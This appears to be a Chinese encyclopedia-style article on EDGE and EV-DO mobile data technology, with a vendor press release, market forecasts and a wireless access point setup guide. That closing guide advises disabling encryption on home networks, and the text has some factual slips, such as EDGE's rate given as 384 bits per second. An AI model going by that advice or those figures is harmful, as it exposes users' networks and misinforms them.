　　一个明显的通信瓶颈是A-bis接口，它当前只能支持每信道时隙16kbps的速率。
　　而对于EDGE，每个信道的速率将超过64kbps，这要求为每个通信信道分配多个A-bis时隙。不过，A-bis接口16kbps的限制可以通过引入两个GPRS编码方案(CS3和CS4)来突破，它能够提供每通信信道22.8kbps的速率。
　　对于基于GPRS的分组数据服务，其他的节点和接口已经能够处理每时隙更高的比特率。对于电路交换服务而言，A-bis接口可以处理每个用户64kbps的速率，因此在MSC中的修改将只会影响软件部分，而不会涉及到原有的硬件设备。
　　(1)无线网络规划
　　一个决定EDGE能否取得成功的重要条件是应该能够允许网络运营商逐步引入EDGE。具有EDGE功能的收发机最早应该部署在最需要EDGE覆盖的地方，以补充现有的标准GSM收发机，因此在一个相同的频段，电路交换、GPRS和EDGE用户服务将同时存在。为了将运营商的投资和成本降到最低，与EDGE相关的实现不应该要求对现有无线网络规划做广泛修改，包括信元规划、频率规划、功率级和其他信元参数的设置等。
　　(2)覆盖范围规划
　　非透明无线链路协议（如包括自动重复请求APR的协议）的一个重要特点是较差的无线链路质量会导致更低的比特率。与语音通信不同的是，低载波-噪声比并不会导致数据会话的丢失，而只会临时地减少用户通信速度。在GSM信元中不同的用户间存在的载波干扰，一个EDGE信元将同时包括具有不同通信速率的用户，在接近信元中心的地方通信速率高，在接近信元边界的地方通信速率限制在标准GPRS的范围内。
　　根据提供给国际标准化组织的测试结果，一个具有95%语音通信业务的EDGE系统将有30%的用户获得超过45Kbps的每时隙通信速率，而全部用户的平均速率为34Kbps。假设APD是2dB，那么平均通信速率将减少到30Kbps。
　　在覆盖范围的问题上，如果网络运营商能够接受在信远边界只具有标准GPRS数据通信速率，那么现有的GSM站点已经提供了EDGE足够使用的覆盖范围。对于一般需要持续比特率的透明数据服务来说，则必须使用链路自适应技术来分配满足比特率和错误比特率（BER）需求时的时隙数量。
　　(3)频率规划
　　在绝大多数成熟的GSM网络中，频率的平均再使用次数在9-12之间，未来的移动通信系统将向着更低的频率再使用方向发展。事实上，随着跳频技术的引进，多重再使用方式(MRP)和非连续传输（DTX）将频率的再使用次数降到3是可行的，这就是说每3个基站就会发生频率被重新使用的情况。
　　EDGE支持频率再使用的这种发展趋势。事实上，由于采用了链路自适应技术，EDGE可以被引入到任何频率计划，包括EDGE可以被引入到现有的GSM频率规划中，为未来更高速率的数据通信打下良好的基础。
　　　5.信道管理
　　引入EDGE以后，一个信元将包括两类收发机：标准GSM收发机和EDGE收发机。信元中的每个物理信道（时隙）一般至少具有四种信道类型：
　　(1)、GSM语音和GSM电路交换数据（CSD）；
　　(2)、GPRS分组数据；
　　(3)、电路交换数据、增强电路交换数据（ECSD）和GSM语音；
　　(4)、EDGE分组数据（EGPRS），它允许同时为GPRS和EDGE用户提供服务。
　　虽然标准的GSM收发机只支持上述信道类型1和2，但EDGE收发机支持上述所有4种类型。EDGE系统中的物理信道将根据终端能力和信元需求动态定义。例如，如果几个语音用户都是活动的，那么1类信道的数量就会增加，同时减少GPRS和EDGE信道。显然，在EDGE系统中必须能够实现上述4种信道的自动管理，否则将大大削弱EDGE系统的效率。
　　　6.链路自适应
　　所谓链路自适应就是能够自动选择调制和编码方案来适应无线链路质量的需求。EDGE标准支持的链路自适应动态选择算法包括对下行链路质量的测量和报告、为上行链路选择新的调制和编码方法等。链路自适应意味着实现调制和编码的完全自动化。通过增量冗余（混合II/IIIARP）改进ARP性能的可能性也正在研究中，这样的方案可以减少在选择调制时对使用链路自适应技术的需求。
　　　7.功率控制
　　当前的GSM系统使用动态功率控制来增加系统中的均等性，扩大移动终端电池的寿命。类似的策略将被用于GPRS，尽管它们实际的信令过程是不同的，但EDGE对功率控制的支持被专家们认为是GSM/GPRS很类似。因此，网络运营商在部署EDGE时只需要修改现有GSM/GPRS网络的参数设置即可。
　　需要补充的是，因EDGE用户可以从比标准GSM用户高得多的载波-干扰比中得到益处，因此EDGE的功率控制参数设置与GSM/GPRS将是不同的。
　　
五、承载业务

　　EDGE的承载业务包括分组业务(非实时业务)和电路交换业务(实时业务)。这些业务的承载者包括如下两种：
　　1.分组交换业务承载者
　　GPRS网络能够提供从移动台到固定IP网的IP连接。对每个IP连接承载者，都定义了一个QoS参数空间，如优先权、可靠性、延时、最大和平均比特率等等。通过对这些参数进行不同的组合就定义了不同的承载者，以满足不同应用的需要。
　　而对EDGE需要定义新的QoS参数空间。例如，对于移动速度为250km/h的移动台，最大码率为144kbit/s，对移动速度为100km/h的移动台，其最大码率为384kbit/s。此外,EDGE的平均比特率和延迟等级也与GPRS的不同。
　　由于不同应用、不同用户的要求不同，因此EDGE必须能够支持更多的QoS。
　　2.电路交换业务承载者
　　现有的GSM系统能够支持透明和非透明业务。它定义了8种透明业务承载者，所提供的比特率范围为9.6kbit/s～64kbit/s。
　　非透明业务承载者用无线链路协议来保证无差错数据传输。对于这种情况，有8种承载者，所提供的比特率为4.8kbit/s～57.6kbit/s。实际的用户数据比特率随信道质量而变化。
　　Tcs-1通过占用2个时隙来实现。而同样的业务，标准GSM系统用 TCH/F14.4需要占用4个时隙。
　　可见，EDGE的电路交换方式可以利用较少的时隙占用来实现较高速的数据业务，这可降低移动终端实现的复杂度。同时，由于各个用户占用的时隙数比标准GSM系统的少，从而可以增加系统的容量。
　　
六、发展状况

　　EDGE是一种基于GSM/GPRS网络的数据增强型移动通信技术，通常又被人们称为2.75代技术。2003年一度倍受忽视的EDGE成为移动通信市场的亮点，先后有美国的CingularWireless和AT&TWireless、智利的TelefonicaMoviles、我国香港特区的CSL和泰国的AIS开通了基于EDGE的服务。与此同时，一些欧洲的移动运营商对EDGE也开始表现出兴趣，其中TIM和TeliaSonera都明确表示将采用EDGE技术。
　　从技术角度来说，EDGE提供了一种新的无线调制模式，提供了三倍于普通GSM空中传输速率。另一方面EDGE继承了GSM制式标准，载频可以基于时隙动态地在GSM和EDGE之间进行转换（基于手机的类型），支持传统的GSM手机，从而保护了现有网络的投资。EDGE 网络可灵活的逐步扩容，为运营商实现价值最大化提供了有利的支持。
　　EDGE（加强型数据GSM环境）是一个更快的全球移动通信系统（GSM）无线服务版本，其被设计为可以以每秒384比特的速度传输数据，并可以传输多媒体以及其它宽带应用程序到移动电话和个人电脑上。EDGE标准是建立在已有的GSM和单元排列标准之上的，前两者使用了相同的时分多路访问（TDMA）帧结构。
　　全球领先的数字无线技术##供应商TTPCom公司宣布已授权ASMobile Communication使用其EDGE协议软件，开发新一代高端多媒体手机。这项协议是基于两家公司持续不断的合作关系，也标志着ASMobile已将TTPCom技术纳入其2005年全线产品发展蓝图，包括入门级GSM/GPRS移动电话及多功能时尚手机。
　　ASMobile是华硕计算机股份有限公司于一年前在台湾成立的全资附属公司，力求在竞争激烈的欧洲与南美市场拓展OEM/ODM服务。该公司采用TTPCom GPRS技术的首个入门级手机系列现已率先投产，并定于2005年1月正式出货，随后还会推出兼备游戏下载等多媒体功能的手机。第一款具有EDGE功能的手机预计于2005年秋季推出。
　　ASMobile EDGE手机的数据传输率是现有GPRS网络提供的三倍，可供全球数目日增的EDGE网络1使用视像下载与高速上网等数据密集的3G服务。这款新手机将采用美国模拟器件公司（Analog Devices）供应的芯片，而TTPCom的EDGE软件与美国模拟器件公司的硬件组合已成为业内公认的能有效加快产品面市时间的技术平台。
　　ASMobile副总裁Allan Cheng表示：“自ASMobile成立以来，我们对市场的发展潜力以及应该设计怎样的手机以应对瞬息万变的市场需求，已经有了清晰的认识。TTPCom作为我们的长期技术合作伙伴，他们的支持将贯穿我们整个产品的发展蓝图。我们未来的EDGE产品均会采用TTPCom业界领先而且备受认同的技术，相信此举不但满足我们积极推出新手机的目标，也同时迎合用户对于新颖手机功能的期盼。”
　　TTPCom软件业务部董事总经理Richard Walker表示：“新加入手机市场的公司可利用我们的平台，推出全面系列的手机；这印证了我们的技术是可靠稳定而且易于整合的。随着EDGE技术的日渐普及，陆续进入这一市场的公司将很有机会获得市场占有率。凭借TTPCom技术，ASMobile将随着EDGE的日益普及，可在市场上力争更具竞争力的地位。”
　　TTPCom 的 EDGE 软件经过了领先的基础设施供应商、测试设备厂商和无线运营商广泛的互通性测试。测试的结果显示，TTPCom 的 EDGE 平台可支持高达每秒 216 Kbs 业界领先的数据传输速率，使网络运营商和手机制造商利用现有2G网络，就可以开始提供如视频流等 3G 类型的服务。
　　编辑备注 － EDGE 在全球的增长情况
　　据全球移动设备供应商协会（the Global Mobile Suppliers Association, GSA）统计，全球 53 个国家的 118 个网络运营商部署了 EDGE，以提供新一代服务。当今在北美、南美、欧洲和亚洲已有 17 个网络供应商使用了 EDGE 服务。中国和香港已宣布部署 EDGE 的网络运营商包括 CSL（已提供EDGE服务）、PEOPLES、 SUNDAY 和中国联通。欲了解全球所有 EDGE 运营商的列表。
　　关于ASMobile Communications
　　ASMobile是华硕计算机股份有限公司的附属公司，也是专业OEM/ODM通讯设备公司，致力设计与生产GSM/GRPS与EDGE移动终端。ASMobile经验丰富的优秀研发小组与手机业内最具创意的硬件和机械结构以及外形设计工程师合作，全力推出合用的方案，以满足市场瞬息万变的需求。此外，ASMobile的研发工作人员已设立##的天线小组与协议部门，专门解决重大的通信问题。 除硬件以外，ASMobile也另设有软件与应用小组，提供稳健的软件环境与操作简易的用户接口，满足用户的个别需求。ASMobile工程人员凭借先进兼精密的设备与技术，不断致力从事开发与生产，令ASMobile提供非常出色并符合严格的业界测试标准的产品。
　　TTPCom与华硕
　　华硕已获授权使用TTPCom整个技术套件，包括双模3GSM协议软件、开发工具和TTPCom的应用架构AJAR平台。AJAR平台提供预先整合套件，包括短信、多媒体、游戏、浏览器和JAVA 技术。
　　TTPCom与华硕早前在香港举行的3G全球大会（3G World Congress）展示华硕首部3G手机。该款手机采用TTPCom的双模3GSM技术和应用套件，具备强大的多媒体功能，包括视频流、3D游戏和音乐下载等。
　　关于TTPCom
　　TTPCom 公司总部位于英国剑桥，是 TTP 通讯有限公司（LSE：TTC）的主要运营分支机构。该公司开发应用于无线通信终端产品设计与制造的技术知识产权。TTPCom 将技术授权给全球领先的半导体生产商和终端制造商，包括美国模拟器件公司、英特尔、LG、Renesas、夏普、西门子和东芝。
　　TTPCom 以其 GPRS、EDGE 和 3G 协议软件确立了全球领先的市场地位。TTPCom 通过其 AJAR 应用架构，可帮助客户快速定制手机产品。2004 年，超过3000万部手机使用了TTPCom的技术上市。
　　
七、技术前景

　　　据Visant Strategies的最新研究，全球移动运营商将EDGE(增强型数据率传输服务)技术用作永久性数据业务修复或者作为一种过渡性方案，可以在今后的几年中增强数据和语音服务。尽管之前不久有许多运营商取消了EDGE，现在该技术又被运营商视为一种提供高速数据业务以及对现在的GSM或TDMS进行容量升级的行性选择。
　　到2009年全球将建立成百上千的EDGE功能基站，因此，EDGE技术在全球大部分地区延迟了下一代设备的销售。此外，研究还发现手机EDGE配件的芯片市场在2009年将到20亿美元，而届时GSM/GPRS/EDGE等手机销售总额为310亿美元。
　　Visant的高深分析师Andy Fuertes说：“据预计EDGE技术的功能将很快被吸收到手机中去，就如同今年GPRS功能已经在手机中普及一样。在今后5年中多数UMTS/GSM双模式手机都将具备EDGE功能，从而使得EDGE功能成为顾客选择手机的重要标准之一。”
　　研究指出，2009年全部EDGE用户将超1.3亿。许多EDGE用户同时也会采用其它技术如UMTS或OFDM类技术。
　　研究报告的另一位作者Larry Swasey说：“从人口密度、平均资本收益、无线普及率以及总体无线网络的回报来看，运营商都会考虑EDGE。这种技术对于运营商来讲可以满足他们可靠的投资与回报的预期。
　　EDGE和GPRS，TD-HSDPA的速度区别
　　GPRS的访问速度171.2kbps
　　EDGE传输速率在峰值可以达到384kbps
　　HSDPA（高速下行分组接入）是WCDMA或TD-SCDMA的升级版，数据通信速率理论上可超过2Mbps。
　　使用EDGE必须达到两个要求
　　1：你所在范围覆盖有EDGE网络。
　　（一些中大型城市一般有EDGE，如果你的城市有EDGE，会自动用EDGE，如果没有，还是自动会用GPRS）
　　2：你的手机支持EDGE。
　　（可以参考自己手机的说明书，另外，一些手机其实具备EDGE功能，只是被屏蔽，没有开启而已）
　　如果知道自己的手机正在使用EDGE网络。
　　看手机的网络图标就知道
　　EDGE 是一个小 “E”，而GPRS 是一个小 “G”
　　
八、国内概况

　　EDGE这个新名词在07年中旬逐渐引起了人们的重视，首先移动在南方少数几个城市进行了EDGE网络的测试，当时使用者对其评价非常高，纷纷拿出自己的测试数据和传统的GPRS与CDMA网络比较，优势还是比较明显的。接下来EDGE网络开始在国内各个城市和地区进行测试，当然不包括北京，上海这样的大城市，因为在新技术的测试过程中这些大城市往往是滞后的。
　　经过了接近一年的实验期和考察期目前在国内多个城市都普及了EDGE网络，很多用户都会惊喜的发现自己手机上显示出了E的标志，这代表的就是EDGE。
　　笔者也通过网络咨询了多个地方的用户，经过反复调查了解到国内已经知道开通EDGE网络的城市和地区有香港、深圳，广州、珠海周边、肇庆、深圳、惠州、东莞、江门、顺德，济南，青岛，西安，成都，重庆，南京，福建等，北京和上海的部分地区也开通了EDGE信号。从分布上看大部分EDGE网络还是位于广东。不过未来EDGE网络一定会由南向北飞速发展的。

　　EV-DO技术的基本思想是把语音业务和数据业务分别放在两个##的载波上承载。这样极大地简化了系统软件的设计难度，避免了复杂的资源调度算法。
　　EV-DO虽然使用单独的载波进行数据传输，但是从射频角度来看，IS-95/2000 1X与EV-DO是完全兼容的。这就意味着基站的射频器件是与IS-95/2000 1X系统可以相同，设备制造商可以不改变设备元器件生产和采购方法，运营商可以在现有网络升级时使用现存的IS-95/2000 1X射频部分，从而在很大程度上保护了之前的投资。
　　EV-DO技术提高了空中接口的传输速率；它采用速率控制而不是功率控制，可以始终使用最大功率发射前向链路信号，提高了可靠性；运用特有的调度算法合理处理小区内多个终端的业务竞争。
　　中国电信3G试商用 3月25日消息，继2月份中国电信首次集采120万台的3G手机后，近日在北京、上海、江苏等首批城市启动CDMA2000 EVDO试商用的活动，主要是以体验高速EVDO上网卡为主。据了解，中国电信将在4月份推动EVDO手机进行试商用，在5月份将在全国启动大规模试商用活动。据了解，各主要CDMA厂家纷纷加快了EVDO制式3G手机的研发测试进度，作为中国电信120万台集采的最大赢家之一的宇龙酷派表示，酷派首款EVDO将于4月底上市，全面配合中国电信全国3G试商用活动,将同时率先推出2款中高端EVDO手机。
　　中国电信4月份试商用
　　2月份中国电信首次集采120万台3G终端，这是继首次抛出电信500万的集采大单后又一大手笔，中国电信预计２００９年ＣＤＭＡ终端（包括手机及上网卡）的需求为５０００万部，其中４０％为３Ｇ终端，中国电信在3G市场的战略布局让整个CDMA产业链显得非常”兴奋”。在此次中国电信总部集采的7款产品中，三星、酷派等CDMA高端产品主力成为赢家，酷派有2款中高端机型入围。而在整个中国电信的采购的37款产品中（包括省公司采购），酷派以6款产品遥遥领先于竞争对手，再次打破了国际品牌在3G市场的垄断地位，走在3G产业的前沿。此次3G终端招标后，CDMA终端款式迅速增加，终端瓶颈得以改善，用户数开始不断增长，为3G正式商用打下伏笔。
　　EVDO 网卡图片据悉，根据中国电信网络建设的时间表，3月15日做到100个城市的CDMA网络3G升级，5月17日则要在全国各个地市完成3G升级，到7月30日全国县级以上城市和地区全部完成3G网络升级。根据中国电信内部人士透露，电信集采的120万台3G手机拟于四月试商用，五月实现规模商用，目前正在进行网络测试。
　　两款EVDO手机将率先上市
　　中电信即将启动的３Ｇ试商用将带来约２０００万的３Ｇ终端定制市场，谁能最快获得市场认可将直接影响着终端厂商在３Ｇ时代的ＣＤＭＡ市场份额。酷派作为3G产业的领跑者，在中国电信3G试商用活动中，快速制胜、技术领跑和品牌拉动再次成为推动3G产业的利器。
　　据悉，宇龙酷派即将上市的EVDO手机型号为酷派N900和E200，是中国电信总部集采的两款EVDO产品，其中N900定位于超高端市场，是中国电信最高端的3G手机机型，也是中国电信主推的3G旗舰产品，**的功能配置与设计重新演绎电信天翼互联网手机的形象，酷派E200则是面向年轻时尚人群推出的3G手机。酷派3G负责人告诉记者，为率先实现在4月底产品率先上市，酷派N900和E200研发项目组人员正加班加点紧锣密鼓进行，甚至有时是通宵加班，从而以”快”切入３Ｇ终端竞争，在新的市场机会面前取得先机。
　　另外，酷派在中国电信首次120万台集采的6款产品中，采取分批上市的策略，除N900产品和E200等2款3G手机在4月底上市，其它4款3G手机也将根据中国电信的要求分期上市，以满足运营商和市场的需求。与此同时，酷派也在加紧CDMA社会化渠道的推动，即将推出的多款CDMA新品，与省级代理商、地级代理商等各个级别的代理商合作，提高CDMA产品的销售覆盖面。
　　在酷派推出自己的旗舰机型后，国际厂商也不甘落后，日韩EVDO的代表品牌三星，也推出了自己的旗舰机型——三星W709，此款机型定位于商务高端市场。其余中低端的EVDO机型也逐步开始上市，这次三星为了中国大陆的3G市场，特地定了一个3G的口号——三星3G，全为您！
　　剩余国际品牌中的NOKIA和索爱均没有大规模的研发自己的EVDO手机，只是上市了几款超低端机型进行实验。
[编辑本段]EVDO无线上网卡设置
　　将即插即用的无线上网卡插入笔记本电脑中，windows xp能识别并装好驱动。接下来就配置ap，ap分为带网关和不带网关的，不带网关的ap就相当于集线器，在这里笔者重点介绍一下不带网关的ap配置。
　　以netgear me102 ap为例，用ap自带的usb连接线把ap和笔记本电脑上的usb接口连接，安装自带的设置软件。
　　1、“开始”的“程序”中找到“netgear me102 apaccess point usb management”并点击，在ap的设置界面中，点击“configure”，进入配置窗口。
　　2、在“general”项，access point name和essid中可随意填写便于记忆的名称。channel也可任意选取，但笔记本电脑中的无线网卡要与其统一。
　　3、“rates”设为“auto”。
　　4、在“ip setting”项，如果使用的是dhcp（动态分配ip地址），选上“dhcp enable”即可，将“dhcp primary prot”设为ethernet。
　　5、在“encryption”项，家庭内使用的笔记本电脑，一般采用disable，即禁用标准加密算法wap。以后两项均可不用考虑。
　　到此，ap设置完成。
　　打开“网上邻居”的“属性”到“无线网络连接状态”，在“属性”中的“无线网络连接属性”，点击“无线网络配置”，在“首选网络”下的“添加”点击“关联”项，将服务名ssid设为与ap的essid统一，然后在用dhcp，将ip设为自动获取。全部设置完成。